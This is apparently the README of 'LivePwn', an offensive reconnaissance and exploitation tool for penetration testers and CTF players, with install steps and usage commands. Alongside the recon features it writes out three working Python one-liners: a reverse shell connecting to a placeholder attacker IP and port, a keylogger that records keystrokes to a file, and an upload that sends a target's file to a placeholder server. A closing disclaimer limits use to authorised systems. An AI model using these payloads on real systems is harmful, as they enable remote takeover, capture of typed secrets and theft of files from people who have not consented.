LivePwn Tool is a powerful, all-in-one reconnaissance and exploitation tool designed for bug hunters, penetration testers, and ethical hackers, and CTF Players.
- WHOIS Lookup: Retrieve domain registration details.
- Subdomain Discovery: Find subdomains using tools like
Sublist3randAmass. - DNS Enumeration: Gather DNS records (A, MX, NS, etc.).
- Directory Brute-Forcing: Discover hidden directories using
Dirb,Gobuster, andDirsearch. - Port Scanning: Identify open ports and services using
Nmap.
- SQL Injection: Automate SQL injection attacks using
SQLMap. - Metasploit Integration: Launch Metasploit modules directly from the tool.
- Reverse Shell: Gain remote access to a target system.
- Keylogger: Capture keystrokes on the target system.
- File Exfiltration: Send files from the target system to your server.
- SQL Injection Payload: Test for SQL injection vulnerabilities.
- XSS Payload: Test for Cross-Site Scripting (XSS) vulnerabilities.
- Remote Code Execution (RCE): Execute commands on the target system.
- Local File Inclusion (LFI): Exploit LFI vulnerabilities.
- Generate detailed reports in
.txtformat for your findings.
- Earn points and badges for discoveries.
- Compete on a global leaderboard (future feature).
- Python 3.x
- Required Python libraries:
pip install requests beautifulsoup4 pynput
git clone https://github.com/livepwn/livepwns.git
cd livepwns
chmod +x setup.sh
./setup.shpython livepwns.py- Launch the tool:
python livepwns.py- Use the interactive menu to select tools, exploits, or payloads.
- Run a specific tool directly:
python livepwns.py --tool <tool_name> --target <target>- Example:
python livepwns.py --tool nmap --target example.com-
Replace (YOUR_IP) and (4444) with your IP and port.
-
Example:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'-
Logs keystrokes to keylog.txt.
-
Example:
python3 -c 'from pynput.keyboard import Listener; import logging; logging.basicConfig(filename="keylog.txt", level=logging.DEBUG, format="%(asctime)s: %(message)s"); def on_press(key): logging.info(str(key)); with Listener(on_press=on_press) as listener: listener.join()'-
Replace YOUR_SERVER with your server URL.
-
Example:
python3 -c 'import requests; url="http://YOUR_SERVER/upload"; files={"file": open("/path/to/target/file.txt", "rb")}; requests.post(url, files=files)'- Perform a WHOIS lookup:
python livepwns.py --tool whois --target example.compython livepwns.py --tool subdomain --target example.com- Run an SQL injection attack:
python livepwns.py --tool sqlmap --target http://example.com/vulnerable_page- Generate a reverse shell payload:
python livepwns.py- Navigate to the Payloads Menu and select Reverse Shell.
- Generate a report of your findings:
python livepwns.py- Navigate to the Generate Report option and provide a report name.
Only use this tool on systems you own or have explicit permission to test.
Ensure you comply with all applicable laws and regulations.
Use this tool responsibly and ethically.
LivePwn
- Github @livepwn
This project is licensed under the MIT License. See the LICENSE file for details.
Contributions are welcome! Please open an issue or submit a pull request.
For support, questions, or feedback, please open an issue on the GitHub repository.
This tool is for educational purposes only. The author is not responsible for any misuse or damage caused by this tool.